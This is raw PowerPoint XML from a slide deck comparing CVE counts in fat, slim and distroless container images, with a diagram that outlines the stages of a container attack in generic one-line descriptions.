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313" r:id="rId2"/>
    <p:sldId id="273" r:id="rId3"/>
    <p:sldId id="258" r:id="rId4"/>
    <p:sldId id="256" r:id="rId5"/>
    <p:sldId id="257" r:id="rId6"/>
    <p:sldId id="259" r:id="rId7"/>
    <p:sldId id="2147483647" r:id="rId8"/>
    <p:sldId id="260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61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3"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="98" d="100"/>
          <a:sy n="98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Equip" panose="02000503030000020004" pitchFamily="2" charset="77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  <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>CVE Vulnerabilities in Fat vs Slim vs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>Distroless</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="7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Equip" panose="02000503030000020004" pitchFamily="2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1-624A-811B-8CC62B09E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53</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>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B1-624A-811B-8CC62B09E7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149</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>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B1-624A-811B-8CC62B09E76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Fat</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>Slim</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>Distroless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669</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>55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B1-624A-811B-8CC62B09E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027247"/>
        <c:axId val="693028959"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="6930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28959"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="693028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2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EF2E5E-D2DF-4050-B9F1-75BAF66899CF}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/hList7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088BF-8C3A-46B1-A329-55D413CD48AA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Reconnaissance</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400">
            <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CAD44BE7-4298-483A-86D1-FE3F7C7E862E}" type="parTrans" cxnId="{FAB5766C-4A8D-47C3-9EE6-DC344178C3EC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1400"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{92CEE4E5-8F4D-4443-9ADB-DF22D5FFEFD6}" type="sibTrans" cxnId="{FAB5766C-4A8D-47C3-9EE6-DC344178C3EC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1400"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E80BF7AD-AD94-4E8A-9C15-AD53F442B1AA}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1400" b="0" i="0" baseline="0" dirty="0">
              <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
            </a:rPr>
            <a:t>Scan container image or service for open ports, vulnerabilities.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" dirty="0">
            <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5875CF13-9FAB-46F7-BF18-1B2F318E744A}" type="parTrans" cxnId="{39D8A5B7-170E-4EA4-8723-2B80490D17C9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1400"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{26B9FDE3-B0B6-428C-B481-2C5669BBD645}" type="sibTrans" cxnId="{39D8A5B7-170E-4EA4-8723-2B80490D17C9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1400"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{68BD4E05-565B-4F87-8C13-6BC862CA3404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Exploitation</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400">
            <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{86418408-F0B7-40F1-AF81-F0A7F912F6CE}" type="parTrans" cxnId="{35DDCBF3-4AE8-4342-8EA3-23AA113726BA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1400"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{42B68ECD-B024-4926-8C1D-4750B6CC4757}" type="sibTrans" cxnId="{35DDCBF3-4AE8-4342-8EA3-23AA113726BA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1400"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DE617E8F-24F2-4EFA-B60B-058DEBB3C6A7}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1400" b="0" i="0" baseline="0" dirty="0">
              <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
            </a:rPr>
            <a:t>Exploit a known CVE or insecure app endpoint (e.g., command injection).</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" dirty="0">
            <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{38BC6FBE-EE13-4E3E-BA41-38BBFDA7B802}" type="parTrans" cxnId="{5787263A-F981-4F71-8B53-FBD3C379C374}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1400"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B3CB5418-53ED-4457-9D40-B5ACE42416E1}" type="sibTrans" cxnId="{5787263A-F981-4F71-8B53-FBD3C379C374}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1400"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{542B890F-A71D-46B5-ADDA-F25869139405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Execution</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400">
            <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1689DCF1-04BB-418B-A412-CA28448EF6B1}" type="parTrans" cxnId="{28561F11-9D9E-42CF-8884-634AF01AFDAF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1400"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{80E0E7DB-7557-4D81-9CDF-43B1118A6277}" type="sibTrans" cxnId="{28561F11-9D9E-42CF-8884-634AF01AFDAF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1400"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7BCF5779-B416-4BE3-97CF-BE4BA5E52EC5}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1400" b="0" i="0" baseline="0">
              <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
            </a:rPr>
            <a:t>Run commands inside container (needs a shell or utility like curl or python).</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400">
            <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{78D4223B-3134-4CA9-B6C6-1214412CD448}" type="parTrans" cxnId="{54DB64CD-7223-47C5-9B2E-E495B1E5665C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1400"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7048D176-F2A4-4A01-8C8B-978392A66870}" type="sibTrans" cxnId="{54DB64CD-7223-47C5-9B2E-E495B1E5665C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1400"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{128707C3-9EC8-414A-B6B3-C2F024287955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Escalation</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400">
            <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DC86D5F5-9EA3-4126-BB12-3B06A3C5C8DB}" type="parTrans" cxnId="{DD0F19C8-D96A-48B2-964A-5DBFF12845A8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1400"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{933A5456-360C-430B-A38D-6CF1A842A84F}" type="sibTrans" cxnId="{DD0F19C8-D96A-48B2-964A-5DBFF12845A8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1400"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A67C8C53-10F2-4301-9B3D-715580CD040B}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1400" b="0" i="0" baseline="0">
              <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
            </a:rPr>
            <a:t>Gain higher privileges (e.g., use CAP_SYS_ADMIN, access host).</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400">
            <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9B32411A-F8D5-426E-B627-D84D21A921B6}" type="parTrans" cxnId="{E6780199-6585-4932-88A3-4CCF5960723B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1400"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B11104E8-A000-4A14-B832-5FB426C18651}" type="sibTrans" cxnId="{E6780199-6585-4932-88A3-4CCF5960723B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1400"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{809545A5-2DBA-4927-B5ED-9A253191B9F6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Persistence</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400">
            <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5960B89C-839E-4A3C-8240-D3E37F6D98B8}" type="parTrans" cxnId="{702DED02-8B17-4135-8F57-EF8868A3BAB6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1400"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7761E594-D833-4239-A701-35267FD7D9BD}" type="sibTrans" cxnId="{702DED02-8B17-4135-8F57-EF8868A3BAB6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1400"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DDE0873D-6EA6-4A90-88A7-BFAE1CC482D9}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1400" b="0" i="0" baseline="0" dirty="0">
              <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
            </a:rPr>
            <a:t>Install backdoors, create rogue processes or </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" b="0" i="0" baseline="0" dirty="0" err="1">
              <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
            </a:rPr>
            <a:t>cron</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" b="0" i="0" baseline="0" dirty="0">
              <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
            </a:rPr>
            <a:t> jobs.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" dirty="0">
            <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6CA689EC-4FF0-48D2-8388-7A44683635D4}" type="parTrans" cxnId="{A36277B9-8555-4F92-9F18-81F3204DF5D1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1400"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BEF1579A-DFF2-4C04-8801-8D7DA0C55DDD}" type="sibTrans" cxnId="{A36277B9-8555-4F92-9F18-81F3204DF5D1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1400"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9A10A023-7212-43F6-A2FC-8A444DD6D7CA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Exfiltration</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400">
            <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{10ACE344-3E18-4785-A509-B10DF71F2A48}" type="parTrans" cxnId="{47900BAA-6241-4295-9137-9A218F5CE40A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1400"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{207043DC-8A0B-49DE-95D8-7B3C4FCCF279}" type="sibTrans" cxnId="{47900BAA-6241-4295-9137-9A218F5CE40A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1400"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4791F128-A52F-46BC-9091-181E8B429286}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1400" b="0" i="0" baseline="0">
              <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
            </a:rPr>
            <a:t>Steal secrets, credentials, or data from volumes or APIs.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400">
            <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1DEC1EC8-08DE-415D-AD27-61021DD1804B}" type="parTrans" cxnId="{A0D287AA-C09F-441E-91BF-51BEE8210A49}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1400"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FF15A660-B1FB-4D96-8DEA-946D98C5C37A}" type="sibTrans" cxnId="{A0D287AA-C09F-441E-91BF-51BEE8210A49}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1400"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6D82F04D-6169-41ED-AE5D-9D03B83F3C9D}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1400" b="1" i="0" baseline="0">
              <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
            </a:rPr>
            <a:t>Lateral Movement</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400">
            <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2BA70BCD-B196-423A-93A9-A24549CD0454}" type="parTrans" cxnId="{208B1BA1-5180-4180-96F5-8F0DFCD67892}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1400"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F5024ABB-9A0C-4C53-931D-7EE3642090D1}" type="sibTrans" cxnId="{208B1BA1-5180-4180-96F5-8F0DFCD67892}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1400"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1BCD1935-B006-4A24-B5DA-822AA1D2AAFD}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1400" b="0" i="0" baseline="0" dirty="0">
              <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
            </a:rPr>
            <a:t>Move to other containers or host via network access.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" dirty="0">
            <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F50A4B92-1398-4D20-B789-C1510F65E839}" type="parTrans" cxnId="{57B8DA7C-0D5A-4857-BACB-05FC8D279B85}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1400"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4FFB408A-9B05-4B0E-A58D-F758A959143A}" type="sibTrans" cxnId="{57B8DA7C-0D5A-4857-BACB-05FC8D279B85}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1400"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D4EB7487-3349-A142-9586-EF47EC8503BE}" type="pres">
      <dgm:prSet presAssocID="{A5EF2E5E-D2DF-4050-B9F1-75BAF66899CF}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{99217E81-A875-B341-A6BC-6AF39FD09B8F}" type="pres">
      <dgm:prSet presAssocID="{A5EF2E5E-D2DF-4050-B9F1-75BAF66899CF}" presName="fgShape" presStyleLbl="fgShp" presStyleIdx="0" presStyleCnt="1"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{31EE3367-98B5-8F43-9F22-5FE3D95850D3}" type="pres">
      <dgm:prSet presAssocID="{A5EF2E5E-D2DF-4050-B9F1-75BAF66899CF}" presName="linComp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{51130E07-1F2C-9446-9B45-806221F1D96E}" type="pres">
      <dgm:prSet presAssocID="{B97088BF-8C3A-46B1-A329-55D413CD48AA}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{243965B4-2471-194C-B3D6-D156970D7AF6}" type="pres">
      <dgm:prSet presAssocID="{B97088BF-8C3A-46B1-A329-55D413CD48AA}" presName="bkgdShape" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="7"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4AD0EE34-7FD3-9847-B3A4-8B3B569FBFAD}" type="pres">
      <dgm:prSet presAssocID="{B97088BF-8C3A-46B1-A329-55D413CD48AA}" presName="nodeTx" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="7">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{47FF3FC2-7D72-9E4D-8EC6-B06D52F4562F}" type="pres">
      <dgm:prSet presAssocID="{B97088BF-8C3A-46B1-A329-55D413CD48AA}" presName="invisiNode" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="7"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B07A4C86-2F40-414F-8CA1-2C2045A73857}" type="pres">
      <dgm:prSet presAssocID="{B97088BF-8C3A-46B1-A329-55D413CD48AA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579C53D9-ACC3-4E43-B350-D1891F617536}" type="pres">
      <dgm:prSet presAssocID="{92CEE4E5-8F4D-4443-9ADB-DF22D5FFEFD6}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0EF7ABC5-F568-3D4E-BFD2-952B5ADCC1A3}" type="pres">
      <dgm:prSet presAssocID="{68BD4E05-565B-4F87-8C13-6BC862CA3404}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{936AAA7C-D8CF-544E-864B-E78DE54C693B}" type="pres">
      <dgm:prSet presAssocID="{68BD4E05-565B-4F87-8C13-6BC862CA3404}" presName="bkgdShape" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="7"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{74BA81F6-6B1C-1D4D-AA9C-69B42C83F7DA}" type="pres">
      <dgm:prSet presAssocID="{68BD4E05-565B-4F87-8C13-6BC862CA3404}" presName="nodeTx" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="7">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6FE40317-148C-D44B-9CE9-A1F38FB6D089}" type="pres">
      <dgm:prSet presAssocID="{68BD4E05-565B-4F87-8C13-6BC862CA3404}" presName="invisiNode" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="7"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3F81B835-4C24-9A4D-8D0C-C6F0F597E591}" type="pres">
      <dgm:prSet presAssocID="{68BD4E05-565B-4F87-8C13-6BC862CA3404}" presName="imagNode" presStyleLbl="fgImgPlac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FE939E86-5859-E04C-9649-6BE79ED34EAE}" type="pres">
      <dgm:prSet presAssocID="{42B68ECD-B024-4926-8C1D-4750B6CC4757}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E6284EF3-A036-704B-AE8C-5624FA826583}" type="pres">
      <dgm:prSet presAssocID="{542B890F-A71D-46B5-ADDA-F25869139405}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C2E27108-F4F5-AB46-AA25-C9F7D182453D}" type="pres">
      <dgm:prSet presAssocID="{542B890F-A71D-46B5-ADDA-F25869139405}" presName="bkgdShape" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="7"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7D207A47-D421-344B-9123-6151FF508CA8}" type="pres">
      <dgm:prSet presAssocID="{542B890F-A71D-46B5-ADDA-F25869139405}" presName="nodeTx" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="7">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BD4DDF32-68C5-634F-9262-60516FC4E730}" type="pres">
      <dgm:prSet presAssocID="{542B890F-A71D-46B5-ADDA-F25869139405}" presName="invisiNode" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="7"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B4BCE903-7ACB-4A43-A8BA-0C6500D44DB4}" type="pres">
      <dgm:prSet presAssocID="{542B890F-A71D-46B5-ADDA-F25869139405}" presName="imagNode" presStyleLbl="fgImgPlace1" presStyleIdx="2" presStyleCnt="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A4DCC543-3DE7-7E45-BA3A-4D593CB1C1A2}" type="pres">
      <dgm:prSet presAssocID="{80E0E7DB-7557-4D81-9CDF-43B1118A6277}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{04BD1655-1EB5-464C-A56C-772192CA6588}" type="pres">
      <dgm:prSet presAssocID="{128707C3-9EC8-414A-B6B3-C2F024287955}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{55848490-D903-DA46-B318-C250CC1A4043}" type="pres">
      <dgm:prSet presAssocID="{128707C3-9EC8-414A-B6B3-C2F024287955}" presName="bkgdShape" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="7"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EF16816E-F96F-B44F-9C2F-034F4F97000D}" type="pres">
      <dgm:prSet presAssocID="{128707C3-9EC8-414A-B6B3-C2F024287955}" presName="nodeTx" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="7">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7C05899C-9E19-7948-83FD-64FE0D63A013}" type="pres">
      <dgm:prSet presAssocID="{128707C3-9EC8-414A-B6B3-C2F024287955}" presName="invisiNode" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="7"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{543CCDCA-6B41-7444-903F-2B020C5293E5}" type="pres">
      <dgm:prSet presAssocID="{128707C3-9EC8-414A-B6B3-C2F024287955}" presName="imagNode" presStyleLbl="fgImgPlac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2FF55076-F8B7-3F4E-B038-8859E5F015AF}" type="pres">
      <dgm:prSet presAssocID="{933A5456-360C-430B-A38D-6CF1A842A84F}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
